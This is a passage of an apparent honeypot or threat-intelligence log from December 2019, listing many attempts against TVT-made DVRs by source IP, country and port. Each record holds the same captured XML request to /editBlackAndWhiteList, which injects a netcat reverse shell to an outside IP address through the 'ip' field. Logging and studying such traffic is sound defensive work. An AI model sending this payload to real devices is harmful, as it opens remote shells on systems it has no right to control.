- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T16:32:06Z",
- "last_seen": "2019-12-20T16:32:06Z"
- },
- {
- "source_ip_address": "187.148.64.191",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T16:16:11Z",
- "last_seen": "2019-12-20T16:16:11Z"
- },
- {
- "source_ip_address": "114.32.8.15",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T15:39:43Z",
- "last_seen": "2019-12-20T15:39:43Z"
- },
- {
- "source_ip_address": "76.70.10.98",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T15:27:21Z",
- "last_seen": "2019-12-20T15:27:21Z"
- },
- {
- "source_ip_address": "61.219.187.44",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 54,
- "first_seen": "2019-12-20T15:19:59Z",
- "last_seen": "2019-12-20T15:19:59Z"
- },
- {
- "source_ip_address": "89.179.243.106",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T15:12:14Z",
- "last_seen": "2019-12-20T15:12:14Z"
- },
- {
- "source_ip_address": "192.0.6.240",
- "country": "KY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T14:43:28Z",
- "last_seen": "2019-12-20T14:43:28Z"
- },
- {
- "source_ip_address": "147.158.52.217",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T14:32:24Z",
- "last_seen": "2019-12-20T14:32:24Z"
- },
- {
- "source_ip_address": "123.110.245.106",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T14:26:29Z",
- "last_seen": "2019-12-20T14:26:29Z"
- },
- {
- "source_ip_address": "46.255.244.217",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T13:59:15Z",
- "last_seen": "2019-12-20T13:59:15Z"
- },
- {
- "source_ip_address": "187.147.123.167",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-20T06:43:52Z",
- "last_seen": "2019-12-20T13:36:48Z"
- },
- {
- "source_ip_address": "88.24.227.219",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T13:33:07Z",
- "last_seen": "2019-12-20T13:33:07Z"
- },
- {
- "source_ip_address": "188.6.64.165",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T13:15:35Z",
- "last_seen": "2019-12-20T13:15:35Z"
- },
- {
- "source_ip_address": "84.52.97.249",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T13:10:10Z",
- "last_seen": "2019-12-20T13:10:10Z"
- },
- {
- "source_ip_address": "124.111.117.196",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T12:59:24Z",
- "last_seen": "2019-12-20T12:59:24Z"
- },
- {
- "source_ip_address": "177.231.221.172",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T12:46:33Z",
- "last_seen": "2019-12-20T12:46:33Z"
- },
- {
- "source_ip_address": "82.80.132.136",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T12:34:59Z",
- "last_seen": "2019-12-20T12:34:59Z"
- },
- {
- "source_ip_address": "87.97.29.163",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T12:22:50Z",
- "last_seen": "2019-12-20T12:22:50Z"
- },
- {
- "source_ip_address": "162.228.90.124",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T12:13:01Z",
- "last_seen": "2019-12-20T12:13:01Z"
- },
- {
- "source_ip_address": "185.169.181.236",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T12:04:34Z",
- "last_seen": "2019-12-20T12:04:34Z"
- },
- {
- "source_ip_address": "76.107.146.121",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T11:37:51Z",
- "last_seen": "2019-12-20T11:37:51Z"
- },
- {
- "source_ip_address": "74.66.194.76",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T11:12:06Z",
- "last_seen": "2019-12-20T11:12:06Z"
- },
- {
- "source_ip_address": "41.215.8.66",
- "country": "KE",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T11:10:30Z",
- "last_seen": "2019-12-20T11:10:30Z"
- },
- {
- "source_ip_address": "175.203.76.251",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T11:10:29Z",
- "last_seen": "2019-12-20T11:10:29Z"
- },
- {
- "source_ip_address": "59.127.66.55",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T11:09:33Z",
- "last_seen": "2019-12-20T11:09:33Z"
- },
- {
- "source_ip_address": "46.233.103.193",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T10:57:53Z",
- "last_seen": "2019-12-20T10:57:53Z"
- },
- {
- "source_ip_address": "176.251.28.222",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T10:42:16Z",
- "last_seen": "2019-12-20T10:42:16Z"
- },
- {
- "source_ip_address": "201.103.248.214",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
